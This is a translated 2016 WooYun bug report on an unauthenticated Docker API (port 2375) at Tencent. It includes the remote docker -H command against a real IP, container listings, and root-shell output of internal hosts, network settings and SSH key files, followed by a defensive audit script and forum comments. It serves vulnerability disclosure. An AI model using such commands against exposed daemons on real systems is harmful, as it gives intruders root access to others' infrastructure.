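Vulnerability summary

Bug ID: wooyun-2016-0209760

Title: A new trick: obtaining root on ten Tencent machines (apparently a 20+ GB code repository)

Vendor: Tencent

Author: 黑客,绝对是黑客

Submitted: 2016-05-17 16:28

Fixed: 2016-07-02 11:50

Made public: 2016-07-02 11:50

Vulnerability type: System/service operations misconfiguration

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]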


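Vulnerability details

Disclosure status:

2016-05-17: Details sent to the vendor; waiting for the vendor to respond
2016-05-18: Vendor confirmed; details disclosed to the vendor only
2016-05-28: Details disclosed to core white hats and experts in related fields
2016-06-07: Details disclosed to regular white hats
2016-06-17: Details disclosed to intern white hats
2016-07-02: Details disclosed to the public

Brief description:

A hacker, definitely a hacker!
Root obtained with no effort at all
To be clear: I did not touch any data or code

Detailed description:

Apparently more than 20 GB of code


Unauthenticated access on port 2375, 10 machines in total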



Using this one as proof: 115.159.119.88

http://115.159.119.88:2375


List images

root@ip-172-31-43-63:/home/ubuntu# docker -H tcp://115.159.119.88:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cb4574cdb29c docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46934->6210/tcp, 0.0.0.0:20066->14888/tcp, 0.0.0.0:46936->36000/tcp container_1458634523754_7996_02_000003_34
aba75599dbd7 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46928->6210/tcp, 0.0.0.0:21951->14888/tcp, 0.0.0.0:46932->36000/tcp container_1458634523754_8238_02_000003_34
f738c487e6ba docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:22086->14888/tcp, 0.0.0.0:46927->36000/tcp container_1460213284004_4606_01_000003_34
2a64fe25ec69 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46925->6210/tcp, 0.0.0.0:20561->14888/tcp, 0.0.0.0:46926->36000/tcp container_1458634523754_8066_02_000003_34
35f7b3709f79 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46924->6210/tcp, 0.0.0.0:22091->14888/tcp, 0.0.0.0:46923->36000/tcp container_1460213284004_4608_01_000002_34
be7f9bc7a60a docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:21736->14888/tcp, 0.0.0.0:46922->36000/tcp container_1458634523754_2349_02_000002_34
b7233a0fd6e2 docker.qq.com:80/gcloud/acc_cloud:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:46919->6220/tcp, 0.0.0.0:46920->6223/tcp, 0.0.0.0:46921->36000/tcp container_1460950863294_0081_01_000005_34
1703ce2bb1ab docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:22051->14888/tcp, 0.0.0.0:46918->36000/tcp container_1460213284004_1645_01_000001_34
b0374417ecf4 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 minutes ago Up 8 minutes 0.0.0.0:21986->14888/tcp, 0.0.0.0:46917->36000/tcp container_1458634523754_10983_02_000001_34
5e10fe7dc8ef docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 6 days ago Up 6 days 0.0.0.0:22441->14888/tcp, 0.0.0.0:46213->36000/tcp container_1460950863294_22798_01_000002_34
e1249fa8b307 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 11 days ago Up 11 days 0.0.0.0:45465->6210/tcp, 0.0.0.0:22426->14888/tcp, 0.0.0.0:45464->36000/tcp container_1460950863294_17702_01_000002_34
954fb5890386 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 13 days ago Up 13 days 0.0.0.0:45132->6210/tcp, 0.0.0.0:22381->14888/tcp, 0.0.0.0:45131->36000/tcp container_1460950863294_15653_01_000002_34
042da5523c5c docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 2 weeks ago Up 2 weeks 0.0.0.0:22366->14888/tcp, 0.0.0.0:43712->36000/tcp container_1460950863294_9355_01_000002_34
7e75db06835c docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 2 weeks ago Up 2 weeks 0.0.0.0:43707->6210/tcp, 0.0.0.0:22346->14888/tcp, 0.0.0.0:43708->36000/tcp container_1460950863294_9089_01_000002_34
7b8c3d8416f5 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:42983->6210/tcp, 0.0.0.0:22306->14888/tcp, 0.0.0.0:42982->36000/tcp container_1460950863294_7315_01_000002_34
ffa5ec0c90a3 docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22281->14888/tcp, 0.0.0.0:42762->36000/tcp container_1460950863294_4170_01_000002_34
8cb83c32b459 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22261->14888/tcp, 0.0.0.0:42599->36000/tcp container_1460950863294_3794_01_000002_34
051108731aab docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:42107->6210/tcp, 0.0.0.0:22246->14888/tcp, 0.0.0.0:42109->36000/tcp container_1460950863294_2688_01_000002_34
043e9e2fe3ce docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 3 weeks ago Up 3 weeks 0.0.0.0:22236->14888/tcp, 0.0.0.0:42104->36000/tcp container_1460950863294_2681_01_000002_34
05bdd4a7450b docker.qq.com:80/gcloud/acc_cloud:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:41027->6220/tcp, 0.0.0.0:41024->6223/tcp, 0.0.0.0:41026->36000/tcp container_1460950863294_0081_01_000002_34
9c4b20ff2175 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:41008->6210/tcp, 0.0.0.0:22221->14888/tcp, 0.0.0.0:41007->36000/tcp container_1460950863294_0021_01_000002_34
aeb0ff169be7 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:22196->14888/tcp, 0.0.0.0:41005->36000/tcp container_1460213284004_6792_01_000002_33
c5a773f8afc7 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 4 weeks ago Up 4 weeks 0.0.0.0:22191->14888/tcp, 0.0.0.0:41004->36000/tcp container_1460213284004_6791_01_000002_33
d108ad37cbb3 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40489->6210/tcp, 0.0.0.0:20021->14888/tcp, 0.0.0.0:40488->36000/tcp container_1458634523754_14139_01_000002_32
60896378d4cf docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:21561->14888/tcp, 0.0.0.0:40486->36000/tcp container_1458634523754_13297_01_000002_32
c1b234c28429 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:22031->14888/tcp, 0.0.0.0:40291->36000/tcp container_1458634523754_12766_01_000002_32
f6254905fc6f docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40289->6210/tcp, 0.0.0.0:20106->14888/tcp, 0.0.0.0:40288->36000/tcp container_1458634523754_11107_01_000002_32
af2ff31c86ab docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:40284->6210/tcp, 0.0.0.0:20261->14888/tcp, 0.0.0.0:40282->36000/tcp container_1458634523754_11010_01_000002_32
d35de4f633fa docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 5 weeks ago Up 5 weeks 0.0.0.0:21996->14888/tcp, 0.0.0.0:40276->36000/tcp container_1458634523754_10985_01_000002_32
0559a177d6b0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:21616->14888/tcp, 0.0.0.0:40269->36000/tcp container_1458634523754_10451_01_000002_32
df8468c257ec docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40267->6210/tcp, 0.0.0.0:20781->14888/tcp, 0.0.0.0:40266->36000/tcp container_1458634523754_9768_01_000002_32
3d0f2f63a1bb docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40265->6210/tcp, 0.0.0.0:21961->14888/tcp, 0.0.0.0:40264->36000/tcp container_1458634523754_9465_01_000002_32
a9c7b78217a8 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40261->6210/tcp, 0.0.0.0:21941->14888/tcp, 0.0.0.0:40262->36000/tcp container_1458634523754_8235_01_000002_32
4d8e7fe3b285 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40192->6210/tcp, 0.0.0.0:20566->14888/tcp, 0.0.0.0:40191->36000/tcp container_1458634523754_8067_01_000002_32
f5950106f1a8 docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest "/etc/rc.local bash 6 weeks ago Up 6 weeks 0.0.0.0:40165->6210/tcp, 0.0.0.0:20726->14888/tcp, 0.0.0.0:40164->36000/tcp container_1458634523754_8010_01_000002_32
d2d3dd6bc3d2 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20676->14888/tcp, 0.0.0.0:40163->36000/tcp container_1458634523754_2412_01_000002_32
7f23e748dd87 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20346->14888/tcp, 0.0.0.0:40146->36000/tcp container_1458634523754_2342_01_000002_32
17470d2efef0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20341->14888/tcp, 0.0.0.0:40145->36000/tcp container_1458634523754_2340_01_000002_32
1d517f7801b5 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:21776->14888/tcp, 0.0.0.0:40062->36000/tcp container_1458634523754_1005_01_000002_32
42bc26a016b6 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 7 weeks ago Up 7 weeks 0.0.0.0:20881->14888/tcp, 0.0.0.0:40061->36000/tcp container_1458634523754_1001_01_000002_32
a253660026e0 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:21511->14888/tcp, 0.0.0.0:39923->36000/tcp container_1458508352011_0322_01_000002_30
e552964949c8 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:20206->14888/tcp, 0.0.0.0:39918->36000/tcp container_1457551624703_8652_01_000002_24
f30c5597ebf2 docker.qq.com:80/gcloud/free_zone_version_server:latest "/etc/rc.local bash 8 weeks ago Up 8 weeks 0.0.0.0:21646->14888/tcp, 0.0.0.0:39914->36000/tcp container_1457551624703_8405_01_000002_24


The image repository is docker.qq.com, which proves this is Tencent
Magic one-click root, logged in successfully
/etc/hosts

[root@docker-10-237-142-103 home]# cat /etc/hosts
127.0.0.1 localhost VM_142_103_centos
10.105.39.219 docker-10-105-39-219
10.105.57.227 docker-10-105-57-227
10.105.48.96 docker-10-105-48-96
10.105.15.73 docker-10-105-15-73
10.105.46.15 docker-10-105-46-15
10.105.52.172 docker-10-105-52-172
10.105.111.112 docker-10-105-111-112
10.105.112.140 docker-10-105-112-140
10.237.132.103 docker-10-237-132-103
10.247.48.125 docker-10-247-48-125
10.237.142.103 docker-10-237-142-103
10.247.70.137 docker-10-247-70-137
10.131.165.90 docker.qq.com docker-10-131-165-90
10.131.164.129 registry.qq.com docker-10-131-164.129
10.105.110.204 docker-10-105-110-204
10.105.110.156 docker-10-105-110-156


ping docker.qq.com

[root@docker-10-237-142-103 home]# ping docker.qq.com
PING docker.qq.com (10.131.165.90) 56(84) bytes of data.
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=1 ttl=61 time=0.334 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=2 ttl=61 time=0.332 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=3 ttl=61 time=0.303 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=4 ttl=61 time=0.304 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=5 ttl=61 time=0.371 ms


ifconfig

[root@docker-10-237-142-103 home]# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 0.0.0.0
ether 56:84:7a:fe:97:99 txqueuelen 0 (Ethernet)
RX packets 2253025437 bytes 153768496578 (143.2 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2183642671 bytes 191079773682 (177.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.237.142.103 netmask 255.255.254.0 broadcast 10.237.143.255
ether 52:54:00:89:9b:8f txqueuelen 1000 (Ethernet)
RX packets 1701689621 bytes 183712984058 (171.0 GiB)
RX errors 0 dropped 1346 overruns 0 frame 0
TX packets 2315262507 bytes 294166431344 (273.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


ssh key

[root@docker-10-237-142-103 ssh]# ls -al
total 288
drwxr-xr-x. 2 root root 4096 Feb 1 11:28 .
drwxr-xr-x. 87 root root 4096 Mar 21 17:01 ..
-rw-r--r--. 1 root root 242153 Mar 6 2015 moduli
-rw-r--r--. 1 root root 2208 Mar 6 2015 ssh_config
-rw------- 1 root root 4378 Feb 1 11:28 sshd_config
-rw-r----- 1 root ssh_keys 227 Nov 26 09:42 ssh_host_ecdsa_key
-rw-r--r-- 1 root root 162 Nov 26 09:42 ssh_host_ecdsa_key.pub
-rw-r----- 1 root ssh_keys 387 Nov 26 09:42 ssh_host_ed25519_key
-rw-r--r-- 1 root root 82 Nov 26 09:42 ssh_host_ed25519_key.pub
-rw-r----- 1 root ssh_keys 1675 Nov 26 09:42 ssh_host_rsa_key
-rw-r--r-- 1 root root 382 Nov 26 09:42 ssh_host_rsa_key.pub

Proof of vulnerability:

Fix:

See http://drops.wooyun.org/papers/15892

Copyright notice: when reposting, please credit the source 黑客,绝对是黑客@WooYun
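
An added example, not part of the original report: a configuration audit for the exposure reported above (Docker daemon API reachable over TCP on port 2375 without authentication). It reads dockerd listener settings from daemon.json text and a dockerd command line and flags every tcp:// listener that is not protected by tlsverify; the function names, sample configurations and certificate paths are constructed for illustration.

```python
import ipaddress
import json
import shlex
from urllib.parse import urlsplit

def _is_loopback(host):
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host or "").is_loopback
    except ValueError:
        return False  # empty or non-literal host: reported conservatively

def audit_dockerd(daemon_json="{}", cmdline=""):
    """Return one finding per tcp:// listener that does not verify client certs."""
    cfg = json.loads(daemon_json)
    hosts = list(cfg.get("hosts", []))
    # "tls": true alone encrypts the channel but authenticates no client.
    tlsverify = cfg.get("tlsverify") is True
    argv = shlex.split(cmdline)
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
    findings = []
    for listener in hosts:
        url = urlsplit(listener)
        if url.scheme == "tcp" and not tlsverify:
            findings.append({"listener": listener, "port": url.port,
                             "remote": not _is_loopback(url.hostname)})
    return findings

# Constructed sample inputs (not taken from the reported hosts).
WEAK_CMDLINE = "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375"
WEAK_JSON = '{"hosts": ["tcp://0.0.0.0:2376"], "tls": true}'
HARDENED_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",  # placeholder paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    print("weak cmdline:", audit_dockerd(cmdline=WEAK_CMDLINE))
    print("tls only:", audit_dockerd(daemon_json=WEAK_JSON))
    print("hardened:", audit_dockerd(daemon_json=HARDENED_JSON))
```

A listener reported with "remote": True is reachable from other hosts and should be removed or moved behind tlsverify with a private CA; one bound to loopback is still open to every local user.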


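Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-05-18 11:40

Vendor reply:

Thank you very much for your report. We have started working on the issue, and we thank everyone for their attention to the security of Tencent's services. If you have any questions, please let us know and a dedicated staff member will follow up.

Latest status:

None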


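Comments on the vulnerability:

Comments

  1. 2016-05-17 16:29 | 机器猫 ( regular white hat | Rank: 1358, vulnerabilities: 291 | Love life, love Tencent, love the internet! A 16-year-old with a dream...)

    First!

  2. 2016-05-17 16:30 | prolog ( regular white hat | Rank: 975, vulnerabilities: 206 )

    Whose alt account is this?

  3. 2016-05-17 16:36 | 凌零1 ( regular white hat | Rank: 320, vulnerabilities: 57 )

    Is your stance standing or sitting?

  4. 2016-05-17 16:37 | Aasron ( regular white hat | Rank: 924, vulnerabilities: 166 | raw_input("你知道我要输入什么?"))

    I've already come up with the title for your next series of vulnerabilities: "A different trick: obtaining root on Tencent machines"

  5. 2016-05-17 16:45 | adminss ( intern white hat | Rank: 37, vulnerabilities: 23 | Can't grind any more, sigh, out of ideas, sigh sigh sigh)

    I've already come up with the title for your next series of vulnerabilities: "A different trick: obtaining root on Tencent machines"

  6. 2016-05-17 16:48 | 木易 ( regular white hat | Rank: 349, vulnerabilities: 71 | No, don't get me wrong, I'm not targeting anyone, I mean everyone here...)

    6

  7. 2016-05-17 16:49 | unfound ( passer-by | Rank: 17, vulnerabilities: 4 | unfound)

    666

  8. 2016-05-17 16:50 | 随风的风 ( regular white hat | Rank: 259, vulnerabilities: 96 | WeChat official account: 233sec, sharing various vulnerability ideas from time to time...)

    Whose alt is this?

  9. 2016-05-17 16:52 | xiaoyu. ( passer-by | Rank: 14, vulnerabilities: 4 | xiaoyu)

    666

  10. 2016-05-17 16:54 | Hax0rs ( intern white hat | Rank: 77, vulnerabilities: 17 | Hax0rs)

    A hacker, definitely a hacker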

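  11. 2016-05-17 16:55 | j14n ( regular white hat | Rank: 2345, vulnerabilities: 421 )

    Tencent Cloud.

  12. 2016-05-17 16:57 | MiCi ( passer-by | Rank: 9, vulnerabilities: 5 | I'm a primary school student preparing for the middle school entrance exam)

    That Docker hole. Respect.

  13. 2016-05-17 16:58 | Vinc ( regular white hat | Rank: 383, vulnerabilities: 58 | Captain Teemo on duty!)

    Try Kingsoft Cloud

  14. 2016-05-17 16:58 | 避孕套 ( passer-by | Rank: 4, vulnerabilities: 1 | 123)

    A hacker, definitely a hacker

  15. 2016-05-17 17:02 | M4sk ( regular white hat | Rank: 1218, vulnerabilities: 323 | Don't know anything....)

    Looks like Tencent Cloud

  16. 2016-05-17 17:04 | 爱偷懒的98 ( regular white hat | Rank: 154, vulnerabilities: 52 | In the old days carriages, horses and mail were all slow; a lifetime was only enough to love one person.)

    Change the text in the parentheses to: "20 GB code repository already dumped" and you'll be famous

  17. 2016-05-17 17:06 | Jovi ( passer-by | Rank: 4, vulnerabilities: 1 | The road ahead is long and far; I shall search high and low)

    Root obtained with no effort at all

  18. 2016-05-17 17:07 | 包包 ( intern white hat | Rank: 77, vulnerabilities: 35 | I'm a newbie, who am I afraid of? I'm new here, hoping the experts will bear with...)

    @MiCi What Docker hole??? Please explain

  19. 2016-05-17 17:09 | scanf ( core white hat | Rank: 1726, vulnerabilities: 243 | 。)

  20. 2016-05-17 17:12 | X20610 ( regular white hat | Rank: 209, vulnerabilities: 40 )

    Ignore it, it's a customer's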

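  21. 2016-05-17 17:13 | n3uz ( passer-by | Rank: 14, vulnerabilities: 3 | This guy is lazy)

    Front row, leaving my name

  22. 2016-05-17 17:24 | milkwort。 ( regular white hat | Rank: 447, vulnerabilities: 74 )

    Awesome, absolutely awesome

  23. 2016-05-17 17:26 | 乐乐、 ( regular white hat | Rank: 879, vulnerabilities: 191 )

    Definitely a hacker

  24. 2016-05-17 20:14 | 鱼化石 ( intern white hat | Rank: 93, vulnerabilities: 18 | Bio cannot be empty)

    Reported to the police!

  25. 2016-05-17 22:17 | 放逐 ( passer-by | Rank: 2, vulnerabilities: 1 | White hat 放逐 Gg? Gains and losses, joy and sorrow, and Av Qq205655539)

    I've already come up with the title for your next series of vulnerabilities: "A different trick: obtaining root on Tencent machines"

  26. 2016-05-18 04:16 | 毛泽车 ( intern white hat | Rank: 43, vulnerabilities: 17 | Comrades, security requires the whole nation to work together, str...)

    666, definitely a hacker

  27. 2016-05-18 14:38 | 黑客,绝对是黑客 ( intern white hat | Rank: 86, vulnerabilities: 6 | A hacker, definitely a hacker)

    @M4sk @X20610 @j14n Nope, Tencent has already confirmed it~

  28. 2016-05-24 12:21 | MiCi ( passer-by | Rank: 9, vulnerabilities: 5 | I'm a primary school student preparing for the middle school entrance exam)

    @包包 http://www.tuicool.com/articles/3Yv2iiY?plg_nld=1&plg_uin=1&plg_auth=1&plg_nld=1&plg_usr=1&plg_vkey=1&plg_dev=1 Sorry, only just saw this, haha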